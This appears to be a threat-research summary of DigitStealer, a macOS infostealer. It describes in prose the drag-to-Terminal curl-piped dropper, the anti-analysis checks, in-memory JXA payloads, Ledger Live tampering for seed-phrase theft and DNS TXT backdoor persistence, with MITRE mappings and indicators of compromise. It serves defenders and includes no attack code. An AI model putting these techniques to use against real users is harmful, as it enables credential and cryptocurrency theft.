Threat Research

DigitStealer MacOS Infostealer

Securonix
DigitStealer MacOS Infostealer

DigitStealer is a macOS information stealer delivered as an unsigned DynamicLake.dmg that runs almost entirely in memory and abuses JavaScript for Automation (JXA) and AppleScript to harvest high-value data. It enforces geographic and Apple Silicon M2+ hardware checks, fetches four in-memory payloads (AppleScript stealer, two obfuscated JXA modules, and a LaunchAgent backdoor using DNS TXT for C2), and tampers with Ledger Live to enable seed-phrase exfiltration. #DigitStealer #LedgerLive

Keypoints

  • Distributed as an unsigned disk image named DynamicLake.dmg that tricks users into executing a curl-piped bash dropper via a “drag-to-Terminal” Gatekeeper bypass.
  • The first-stage bash dropper performs geographic filtering (blocks former Soviet states and associated countries) and extensive anti-analysis checks to exclude VMs, Intel Macs, and M1 systems.
  • Hardware-specific checks verify Apple Silicon M2+ features, and the malware refuses to run if expected ARM capabilities are missing.
  • Four separate in-memory payloads are fetched from Cloudflare Pages: an AppleScript infostealer, two obfuscated JXA modules (general stealer and Ledger Live modifier), and a LaunchAgent persistence script.
  • The Ledger Live attack downloads three segmented pieces, concatenates them in memory, and swaps a trojanized app.asar into the legitimate bundle to facilitate seed-phrase exfiltration.
  • Persistence is achieved via a LaunchAgent that queries a DNS TXT record for the current backdoor URL and repeatedly downloads and runs obfuscated JXA code, sending an MD5-hashed hardware UUID with each request.

MITRE Techniques

  • [T1204.002 ] User Execution: Malicious File – Delivered as an unsigned DMG and executed by tricking the user to drag a disguised file into Terminal to run a curl-piped bash one-liner (‘…victim drags a disguised .msi text file into Terminal, triggering a one-liner that uses curl to pull and pipe an obfuscated bash dropper directly into memory.’)
  • [T1059 ] Command and Scripting Interpreter – Uses bash, AppleScript, and JavaScript for Automation (JXA) to execute in-memory payloads for data theft and application tampering (‘…leverages JavaScript for Automation (JXA) and AppleScript…’ and ‘the dropper uses nohup curl to fetch four additional payloads… and executes them directly in memory’).
  • [T1036 ] Masquerading – Impersonates a legitimate utility by distributing an unsigned DynamicLake.dmg to evade user suspicion (‘…distributed as an unsigned disk image named DynamicLake.dmg, the sample impersonates the legitimate DynamicLake utility’).
  • [T1497 ] Virtualization/Sandbox Evasion – Implements extensive anti-analysis checks to detect VMs, Intel/M1 hardware, and geographic locations, exiting if checks fail (‘…blocks execution on virtual machines, Intel-based Macs, M1 chips, and systems in specific geographic locales’ and ‘introduces checks specific to Apple Silicon hardware features introduced with the M2 series…’).
  • [T1547 ] Boot or Logon Autostart Execution – Installs a LaunchAgent plist that fetches and executes updated JXA backdoor code to maintain persistence (‘…drops a LaunchAgent plist…the agent queries a DNS TXT record on the C2 to retrieve the current backdoor URL, then continuously downloads and executes fresh obfuscated JXA every ten seconds’).
  • [T1071.004 ] Application Layer Protocol: DNS – Uses DNS TXT records to deliver the current backdoor URL to the LaunchAgent for C2 coordination (‘…the agent queries a DNS TXT record on the C2 to retrieve the current backdoor URL…’).
  • [T1041 ] Exfiltration Over C2 Channel – Exfiltrates harvested files, Notes data, and other targeted information to the attacker-controlled C2 (‘…harvests Desktop, Documents, and Downloads files and Notes data, then exfiltrates everything to the C2.’)
  • [T1555 ] Credentials from Password Stores – Targets the Keychain, browser profiles, cryptocurrency wallets, and Ledger Live to steal credentials and seed phrases (‘…targeting browser profiles, cryptocurrency wallets, the Keychain database, VPN configs, and Telegram tdata’ and Ledger Live modifications to enable seed-phrase exfiltration).

Indicators of Compromise

  • [File Hash ] DigitStealer sample hashes – 226cbbf43d9bcedcc5ab69e51e5cce2f4ca841aa7ab39fdf974766203e2c9b66, 5420a25fdd6cb6484ab3687c6bba750b40007730eb4232088b668eff0de2c072, and 3 more hashes.
  • [File Name ] Distribution artifact and dropper trigger – DynamicLake.dmg, disguised .msi text file used for drag-to-Terminal execution.
  • [File Path ] Ledger Live tampering target – ~/Library/Application Support/Ledger Live/app.json (modified to point to attacker-controlled endpoints) and trojanized app.asar segments concatenated in memory.
  • [Persistence ] LaunchAgent and DNS-based C2 retrieval – LaunchAgent plist that queries DNS TXT records on the attacker C2 to retrieve backdoor URLs and fetch JXA payloads.
  • [Infrastructure ] Hosting and delivery – Payloads fetched from Cloudflare Pages infrastructure (used as hosting for the four in-memory payloads) and DNS TXT records for C2 coordination.

Read more: https://blog.polyswarm.io/digitstealer-macos-infostealer